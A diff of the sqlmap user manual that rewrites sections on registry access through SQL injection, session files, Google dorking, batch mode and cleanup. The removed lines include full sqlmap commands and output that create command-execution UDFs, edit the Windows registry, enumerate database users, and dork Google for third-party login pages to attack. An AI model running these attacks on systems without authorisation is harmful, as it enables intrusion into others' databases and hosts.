-Microsoft SQL Server, and when the underlying database layer 
-supports stacked SQL queries. Also, session user has to have
-the needed privileges to access it.
+It is possible to access Windows registry when the back-end database
+management system is either MySQL, PostgreSQL or Microsoft SQL Server,
+and when the web application supports stacked queries. Also, session user
+has to have the needed privileges to access it.
 
 <sect2>Read a Windows registry key value
 
@@ -4996,41 +2587,6 @@ Switch: <tt>-</tt><tt>-reg-read</tt>
 <p>
 Using this option you can read registry key values.
 
-<p>
-Example on a <bf>PostgreSQL 8.4</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.php?id=1 --reg-read
-
-[...]
-web server operating system: Windows
-web application technology: PHP 5.3.1, Apache 2.2.14
-back-end DBMS: PostgreSQL
-
-[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:15] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:15] [INFO] retrieved: 8.4.2,
-[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:23] [INFO] retrieved: 1
-[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:23] [INFO] testing if current user is DBA
-[hh:mm:23] [INFO] retrieved: 1
-[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist
-[hh:mm:23] [INFO] retrieved: 0
-[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist
-[hh:mm:24] [INFO] retrieved: 0
-[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file
-[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file
-which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
-CurrentVersion]
-which registry key value do you want to read? [ProductName]
-[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
-Windows NT\CurrentVersion\ProductName'
-[hh:mm:35] [INFO] retrieved: ProductName        REG_SZ  Microsoft Windows XP
-Registry key value data:    'ProductName        REG_SZ  Microsoft Windows XP'
-</verb></tscreen>
-
 <sect2>Write a Windows registry key value
 
 <p>
@@ -5039,38 +2595,6 @@ Switch: <tt>-</tt><tt>-reg-add</tt>
 <p>
 Using this option you can write registry key values.
 
-<p>
-Example on a <bf>PostgreSQL 8.4</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.php?id=1 --reg-add
-
-[...]
-web server operating system: Windows
-web application technology: PHP 5.3.1, Apache 2.2.14
-back-end DBMS: PostgreSQL
-
-[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:20] [INFO] retrieved: 8.4.2,
-[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:29] [INFO] retrieved: 1
-[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:30] [INFO] testing if current user is DBA
-[hh:mm:30] [INFO] retrieved: 1
-[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
-[hh:mm:30] [INFO] retrieved: 0
-[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
-which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
-which registry key value do you want to write? Test
-which registry key value data do you want to write? 1
-which registry key value data-type is it? [REG_SZ] REG_DWORD
-[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'
-with data '1'. This will work only if the user running the database process has privileges
-to modify the Windows registry.
-</verb></tscreen>
-
 <sect2>Delete a Windows registry key
 
 <p>
@@ -5079,43 +2603,10 @@ Switch: <tt>-</tt><tt>-reg-del</tt>
 <p>
 Using this option you can delete registry keys.
 
-<p>
-Example on a <bf>PostgreSQL 8.4</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.php?id=1 --reg-del
-
-[...]
-web server operating system: Windows
-web application technology: PHP 5.3.1, Apache 2.2.14
-back-end DBMS: PostgreSQL
-
-[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:20] [INFO] retrieved: 8.4.2,
-[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:29] [INFO] retrieved: 1
-[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:30] [INFO] testing if current user is DBA
-[hh:mm:30] [INFO] retrieved: 1
-[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
-[hh:mm:30] [INFO] retrieved: 0
-[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
-which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
-which registry key value do you want to delete? Test
-are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\
-sqlmap\Test? [y/N] y
-[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'. 
-This will work only if the user running the database process has privileges to modify the 
-Windows registry.
-</verb></tscreen>
-
-
 <sect2>Auxiliary registry switches
 
 <p>
-Switches: <tt>-</tt><tt>-reg-key</tt>, <tt>-</tt><tt>-reg-value</tt>, 
+Switches: <tt>-</tt><tt>-reg-key</tt>, <tt>-</tt><tt>-reg-value</tt>,
 <tt>-</tt><tt>-reg-data</tt> and <tt>-</tt><tt>-reg-type</tt>
 
 <p>
@@ -5126,80 +2617,52 @@ information when asked, you can use them at command prompt as program
 arguments.
 
 <p>
-With <tt>-</tt><tt>-reg-key</tt> option you specify used windows 
-registry key path, with <tt>-</tt><tt>-reg-value</tt> value item
-name inside provided key, with <tt>-</tt><tt>-reg-data</tt> value 
-data, while with <tt>-</tt><tt>-reg-type</tt> option you specify
-type of the value item.
+With <tt>-</tt><tt>-reg-key</tt> option you specify used Windows registry
+key path, with <tt>-</tt><tt>-reg-value</tt> value item name inside
+provided key, with <tt>-</tt><tt>-reg-data</tt> value data, while with
+<tt>-</tt><tt>-reg-type</tt> option you specify type of the value item.
 
 <p>
-So, another way of running example from option 
-<tt>-</tt><tt>-reg-add</tt> could be:
+A sample command line for adding a registry key hive follows:
 
 <tscreen><verb>
-$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.php?id=1 --reg-add \ 
-  --reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1
+$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \ 
+  --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
 </verb></tscreen>
 
-<sect1>Miscellaneous
 
-<sect2>Session file: save and resume all data retrieved
+<sect1>General
+
+
+<sect2>TODO
+
+<p>
+Switch: <tt>-t</tt>
+
+<p>
+TODO
+
+
+<sect2>Session file: save and resume data retrieved
 
 <p>
 Switch: <tt>-s</tt>
 
 <p>
-By default sqlmap logs all queries and their output into a text file while
-performing whatever request, both in blind SQL injection and in inband SQL
-injection.
-This is useful if you stop the injection and resume it after some time.
+By default sqlmap logs all queries and their output into a textual file
+called <em>session file</em>, regardless of the technique used to extract
+the data.
+This is useful if you stop the injection for any reason and rerun it
+afterwards: sqlmap will parse the session file and resume enumerated data
+from it, then carry on extracting data from the exact point where it left
+before you stopped the tool.
 
 <p>
-The default session file is <tt>output/hostname/session</tt>, but you can
-change its path with the <tt>-s</tt> option.
+The default session file is <tt>output/TARGET_URL/session</tt>, but you
+can specify a different file path with <tt>-s</tt> switch.
 
 <p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" -b \
-  -v 2 -s "sqlmap.log"
-
-[...]
-back-end DBMS:  PostgreSQL
-[hh:mm:02] [DEBUG] query: VERSION()
-[hh:mm:02] [INFO] retrieved: PostgreSQL 8.3.5 on i486-pc-^C
-[hh:mm:03] [ERROR] user aborted
-</verb></tscreen>
-
-<p>
-As you can see, I stopped the injection with <tt>CTRL-C</tt> while
-retrieving the PostgreSQL banner and logged the session to text file
-<tt>sqlmap.log</tt>.
-
-<tscreen><verb>
-$ cat sqlmap.log
-
-[hh:mm:00 MM/DD/YY]
-[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection point][GET]
-[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection parameter][id]
-[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection type][numeric]
-[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][Parenthesis][0]
-[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][CONCAT('9', '9')][]
-[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH(SYSDATE)][]
-[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][COALESCE(3, NULL)][3]
-[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH('3')][1]
-[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][DBMS][PostgreSQL]
-[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][VERSION()][PostgreSQL 8.3.5 
-on i486-pc-
-</verb></tscreen>
-
-<p>
-As you can see, all queries performed and their output have been logged to
-the session file in real time while performing the injection.
-
-<p>
-The session file has a structure as follows:
+The session file has the following structure:
 
 <tscreen><verb>
 [hh:mm:ss MM/DD/YY]
@@ -5207,55 +2670,22 @@ The session file has a structure as follows:
 </verb></tscreen>
 
 <p>
-Performing the same request now, sqlmap resumes all information already
-retrieved then calculates the query length, in the example
-<tt>VERSION()</tt>, and resumes the injection from the last character
-retrieved to the end of the query output.
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" -b \
-  -v 2 -s "sqlmap.log"
-
-[...]
-[hh:mm:03] [INFO] resuming injection point 'GET' from session file
-[hh:mm:03] [INFO] resuming injection parameter 'id' from session file
-[hh:mm:03] [INFO] resuming injection type 'numeric' from session file
-[hh:mm:03] [INFO] resuming 0 number of parenthesis from session file
-[hh:mm:03] [INFO] resuming back-end DBMS 'PostgreSQL' from session file
-[hh:mm:03] [INFO] testing connection to the target url
-[hh:mm:03] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:03] [INFO] retrieving the length of query output
-[hh:mm:03] [DEBUG] query: LENGTH(VERSION())
-[hh:mm:03] [INFO] retrieved: 98
-[hh:mm:03] [INFO] resumed from file 'sqlmap.log': PostgreSQL 8.3.5 on i486-pc-...
-[hh:mm:03] [INFO] retrieving pending 70 query output characters
-[hh:mm:03] [DEBUG] query: SUBSTR((VERSION())::text, 29, 98)
-[hh:mm:03] [INFO] retrieved: linux-gnu, compiled by GCC gcc-4.3.real 
-(Ubuntu 4.3.2-1ubuntu11) 4.3.2
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-back-end DBMS: PostgreSQL
-
-[hh:mm:07] [INFO] fetching banner
-banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
-(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
-</verb></tscreen>
+A more user friendly textual file where all data retrieved is saved, is
+the <em>log file</em>, <tt>output/TARGET_URL/log</tt>. This file can be
+useful to see all information enumerated to the end.
 
 
-<sect2>Flush session file for current target
+<sect2>Flush session file
     
 <p>
 Switch: <tt>-</tt><tt>-flush-session</tt>
 
 <p>
 As you are already familiar with the concept of a session file from the
-description of option <tt>-s</tt>, it is good to know that you can flush
-the content of that same file using option <tt>-</tt><tt>-flush-session</tt>.
-This way you can avoid caching mechanisms implemented by default in
-sqlmap. Other possible way is the manual removing of session file(s),
-<tt>sqlmap.log</tt> in the example above, or the default
-<tt>output/hostname/session</tt> if <tt>-s</tt> is not provided.
+description above, it is good to know that you can flush the content of
+that file using option <tt>-</tt><tt>-flush-session</tt>.
+This way you can avoid the caching mechanisms implemented by default in
+sqlmap. Other possible way is to manually remove the session file(s).
 
 
 <sect2>Estimated time of arrival
@@ -5264,109 +2694,41 @@ sqlmap. Other possible way is the manual removing of session file(s),
 Switch: <tt>-</tt><tt>-eta</tt>
 
 <p>
-It is possible to calculate and show the estimated time of arrival to
-retrieve each query output in real time while performing the SQL injection
-attack.
+It is possible to calculate and show in real time the estimated time of
+arrival to retrieve each query output. This is shown when the technique
+used to retrieve the output is any of the blind SQL injection types.
 
 <p>
-Example on an <bf>Oracle XE 10.2.0.1</bf> target:
+Example against an Oracle target affected only by boolean-based blind SQL
+injection:
 
 <tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -b \
-  --eta -v 2
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
 
 [...]
-back-end DBMS:	Oracle
-
-[hh:mm:24] [INFO] fetching banner
-[hh:mm:24] [INFO] the resumed output is partial, sqlmap is going to retrieve the query 
-output again
-[hh:mm:24] [INFO] retrieved the length of query output: 64
-[hh:mm:24] [DEBUG] query: SELECT NVL(CAST(banner AS VARCHAR(4000)), (CHR(32))) FROM v$version 
-WHERE ROWNUM=1
-77% [=======================================>            ] 49/64  ETA 00:00    
+[hh:mm:01] [INFO] the back-end DBMS is Oracle
+[hh:mm:01] [INFO] fetching banner
+[hh:mm:01] [INFO] retrieving the length of query output
+[hh:mm:01] [INFO] retrieved: 64
+17% [========>                                          ] 11/64  ETA 00:19
 </verb></tscreen>
 
 <p>
-then:
+Then:
 
 <tscreen><verb>
-100% [====================================================] 64/64              
-[hh:mm:15] [DEBUG] performed 454 queries in 2 seconds
-banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
-</verb></tscreen>
+100% [===================================================] 64/64               
+[10:28:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
 
-<p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" \
-  --users --eta -v 1
-
-[...]
-back-end DBMS:	Microsoft SQL Server 2000
-
-[hh:mm:57] [INFO] fetching database users
-[hh:mm:57] [INFO] fetching number of database users
-[hh:mm:57] [INFO] retrieved: 3
-[hh:mm:57] [INFO] retrieved the length of query output: 22
-100% [====================================================] 22/22
-[hh:mm:58] [INFO] retrieved the length of query output: 2
-100% [====================================================] 2/2
-[hh:mm:59] [INFO] retrieved the length of query output: 25
-100% [====================================================] 25/25
-[hh:mm:00] [DEBUG] performed 181 queries in 1 seconds
-database management system users [3]:
-[*] BUILTIN\Administrators
-[*] sa
-[*] W2KITINQUIS\Administrator
+web application technology: PHP 5.2.6, Apache 2.2.9
+back-end DBMS: Oracle
+banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
 </verb></tscreen>
 
 <p>
 As you can see, sqlmap first calculates the length of the query output,
 then estimates the time of arrival, shows the progress in percentage and
-counts the number of retrieved query output characters.
-
-
-<sect2>Use Google dork results from specified page number
-
-<p>
-Switch: <tt>-</tt><tt>-gpage</tt>
-
-<p>
-Default sqlmap behavior with option <tt>-g</tt> is to do a Google
-search and use resulting urls from first (100) result page for further 
-sql injection testing. In combination with this option you can specify
-some other page other than the first one for retrieving target urls.
-
-<p>
-Example of Google dorking with expression <tt>login ext:php</tt> 
-and resulting page set to 3:
-
-<tscreen><verb>
-$ python sqlmap.py -g "ext:php login" --gpage 3 -v 1
-
-[hh:mm:14] [INFO] first request to Google to get the session cookie
-[hh:mm:14] [INFO] using Google result page #3
-[hh:mm:14] [INFO] sqlmap got 100 results for your Google dork expression, 89 of them are 
-testable targets
-[hh:mm:15] [INFO] sqlmap got a total of 89 targets
-url 1:
-GET http://www.XXX.com/index.php?pageid=login
-do you want to test this url? [Y/n/q]
-> y
-[hh:mm:17] [INFO] testing url http://www.XXX.com/index.php?pageid=login
-[hh:mm:17] [INFO] using '/home/inquis/sqlmap/output/www.XXX.com/session' as session file
-[hh:mm:17] [INFO] testing connection to the target url
-[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:19] [INFO] url is stable
-[hh:mm:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:22] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
-[hh:mm:24] [INFO] confirming that Cookie parameter 'PHPSESSID' is dynamic
-[hh:mm:27] [INFO] Cookie parameter 'PHPSESSID' is dynamic
-[...]
-</verb></tscreen>
+counts the number of retrieved output characters.
 
 
 <sect2>Update sqlmap
@@ -5375,27 +2737,17 @@ do you want to test this url? [Y/n/q]
 Switch: <tt>-</tt><tt>-update</tt>
 
 <p>
-Using this option you can update the program to the latest version
-directly from the Subversion repository along with the latest
-Microsoft SQL Server XML versions file from Chip Andrews'
-<htmlurl url="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
-name="SQLSecurity.com site">.
-
-<tscreen><verb>
-$ python sqlmap.py --update
-
-[...]
-[hh:mm:27] [INFO] updating sqlmap to latest development version from the subversion repository
-[hh:mm:28] [INFO] updated to the latest revision XXXX
-[hh:mm:29] [INFO] updating Microsoft SQL Server XML versions file
-[hh:mm:33] [INFO] no new Microsoft SQL Server versions since the last update
-[...]
-</verb></tscreen>
+Using this option you can update the tool to the latest development
+version directly from the subversion repository. You obviously need
+Internet access.
 
 <p>
-The Debian and Red Hat installation packages (deb and rpm) as well as the
-Windows binary package (exe) can not be used to update sqlmap. You need
-a source package (gzip, bzip2 or zip) to use this feature.
+If, for any reason, this operation fails, try with a manual <tt>svn
+update</tt> from your sqlmap working copy. It will perform the exact same
+operation of switch <tt>-</tt><tt>-update</tt>.
+If you are running sqlmap on Windows, you can use the TartoiseSVN client
+by right-clicking in Windows Explorer into your local sqlmap working copy
+and <tt>Update</tt>.
 
 
 <sect2>Save options in a configuration INI file
@@ -5406,153 +2758,8 @@ Switch: <tt>-</tt><tt>-save</tt>
 <p>
 It is possible to save the command line options to a configuration INI
 file.
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" -b \
-  -v 1 --save
-
-[hh:mm:33] [INFO] saved command line options on '/home/inquis/sqlmap/sqlmap-SAUbs.conf' 
-configuration file
-[hh:mm:33] [INFO] testing connection to the target url
-[hh:mm:33] [INFO] testing if the url is stable, wait a few seconds
-[...]
-</verb></tscreen>
-
-<p>
-As you can see, sqlmap saved the command line options to a configuration
-INI file, <tt>sqlmap-SAUbs.conf</tt>.
-
-<tscreen><verb>
-$ cat sqlmap-SAUbs.conf
-[Target]
-url = http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1
-googledork = 
-configfile = 
-list = 
-requestfile = 
-
-[Windows]
-regread = False
-regval = 
-regdata = 
-regadd = False
-regdel = False
-regtype = 
-regkey = 
-
-[User-defined function]
-shlib = 
-udfinject = False
-
-[Request]
-cookieurlencode = False
-ignoreproxy = False
-threads = 1
-acert = 
-retries = 3
-useragentsfile = 
-atype = 
-agent = 
-delay = 0
-headers = 
-cookie = 
-proxy = 
-timeout = 30
-scope = 
-acred = 
-referer = 
-dropsetcookie = False
-data = 
-method = GET
-
-[Miscellaneous]
-updateall = False
-sessionfile = 
-eta = False
-batch = False
-flushsession = False
-cleanup = False
-googlepage = 0
-verbose = 1
-
-[Enumeration]
-limitstop = 0
-getpasswordhashes = False
-excludesysdbs = False
-getcurrentdb = False
-getcurrentuser = False
-limitstart = 0
-query = 
-getusers = False
-isdba = False
-gettables = False
-dumptable = False
-getdbs = False
-db = 
-sqlshell = False
-tbl = 
-firstchar = 0
-getcolumns = False
-getbanner = True
-dumpall = False
-getprivileges = False
-lastchar = 0
-col = 
-user = 
-
-[File system]
-dfile = 
-wfile = 
-rfile = 
-
-[Takeover]
-msfpath = 
-osshell = False
-ossmb = False
-privesc = False
-ospwn = False
-tmppath = 
-oscmd = 
-osbof = False
-
-[Fingerprint]
-extensivefp = False
-
-[Injection]
-dbms = 
-string = 
-postfix = 
-regexp = 
-prefix = 
-testparameter = 
-estring = 
-eregexp = 
-os = 
-
-[Techniques]
-utech = 
-unionuse = False
-timetest = False
-uniontest = False
-stackedtest = False
-timesec = 5
-</verb></tscreen>
-
-<p>
-The file is a valid sqlmap configuration INI file.
-You can edit the configuration options as you wish and pass it to sqlmap
-with the <tt>-c</tt> option as explained above in section 5.2.5:
-
-<tscreen><verb>
-$ python sqlmap.py -c sqlmap-SAUbs.conf
-
-[...]
-banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
-(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
-</verb></tscreen>
+The generated file can then be edited and passed to sqlmap with the
+<tt>-c</tt> option as explained above.
 
 
 <sect2>Act in non-interactive mode
@@ -5562,50 +2769,32 @@ Switch: <tt>-</tt><tt>-batch</tt>
 
 <p>
 If you want sqlmap to run as a batch tool, without any user's interaction 
-when sqlmap requires it, you can force it by using <tt>-</tt><tt>-batch</tt>
-option, and leave sqlmap to go for a default behaviour.
+when sqlmap requires it, you can force that by using
+<tt>-</tt><tt>-batch</tt> switch. This will leave sqlmap to go with a
+default behaviour whenever user's input would be required.
+
+
+<sect1>Miscellaneous
+
+<sect2>TODO
 
 <p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int_str.php?id=1&amp;name=luther" \
-  --batch -v 1
-
-[...]
-[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
-[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
-[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
-[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
-[hh:mm:22] [INFO] GET parameter 'name' is dynamic
-[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
-[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
-[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
-[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
-[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
-[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
-[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go
-ahead:
-[0] place: GET, parameter: id, type: numeric (default)
-[1] place: GET, parameter: name, type: stringsingle
-[q] Quit
-Choice: 0
-[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
-[...]
-back-end DBMS:	MySQL >= 5.0.0
-</verb></tscreen>
+Switch: <tt>-</tt><tt>-beep</tt>
 
 <p>
-As you can see, sqlmap by default chose the injection payload to the first
-vulnerable parameter.
+TODO
 
 
-<sect2>Cleanup the DBMS by sqlmap specific UDF(s) and table(s)
+<sect2>TODO
+
+<p>
+Switch: <tt>-</tt><tt>-check-payload</tt>
+
+<p>
+TODO
+
+
+<sect2>Cleanup the DBMS from sqlmap specific UDF(s) and table(s)
 
 <p>
 Switch: <tt>-</tt><tt>-cleanup</tt>
@@ -5613,30 +2802,57 @@ Switch: <tt>-</tt><tt>-cleanup</tt>
 <p>
 It is recommended to clean up the back-end database management system from
 sqlmap temporary table(s) and created user-defined function(s) when you
-are done with owning the underlying operating system or file system.
+are done taking over the underlying operating system or file system.
+Switch <tt>-</tt><tt>-cleanup</tt> will attempt to clean up the DBMS and
+the file system wherever possible.
+
+
+<sect2>TODO
 
 <p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
+Switch: <tt>-</tt><tt>-forms</tt>
 
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/iis/get_int.aspx?id=1" \
-  -v 2 --cleanup
+<p>
+TODO
 
-[...]
-[hh:mm:18] [INFO] cleaning up the database management system
-[hh:mm:18] [DEBUG] removing support tables
-[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapoutput
-do you want to remove sys_exec UDF? [Y/n] 
-[hh:mm:20] [DEBUG] removing sys_exec UDF
-[hh:mm:20] [DEBUG] query: DROP FUNCTION sys_exec(text)
-do you want to remove sys_eval UDF? [Y/n] 
-[hh:mm:21] [DEBUG] removing sys_eval UDF
-[hh:mm:21] [DEBUG] query: DROP FUNCTION sys_eval(text)
-[hh:mm:21] [INFO] database management system cleanup finished
-[hh:mm:21] [WARNING] remember that UDF shared library files saved on the file system can 
-only be deleted manually
-</verb></tscreen>
+
+<sect2>Use Google dork results from specified page number
+
+<p>
+Switch: <tt>-</tt><tt>-gpage</tt>
+
+<p>
+Default sqlmap behavior with option <tt>-g</tt> is to do a Google
+search and use the first 100 resulting URLs for further SQL injection
+testing. However, in combination with this option you can specify with
+this switch, <tt>-</tt><tt>-gpage</tt>, some page other than the first one
+to retrieve target URLs from.
+
+
+<sect2>TODO
+
+<p>
+Switch: <tt>-</tt><tt>-parse-errors</tt>
+
+<p>
+TODO
+
+
+<sect2>TODO
+
+<p>
+Switch: <tt>-</tt><tt>-replicate</tt>
+
+<p>
+TODO
+
+
+<sect>License and copyright
+
+<p>
+sqlmap is released under the terms of the
+<htmlurl url="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html" name="General Public License v2">.
+sqlmap is copyrighted by its <htmlurl url="http://sqlmap.sourceforge.net/#developers" name="developers">.
 
 
 <sect>Disclaimer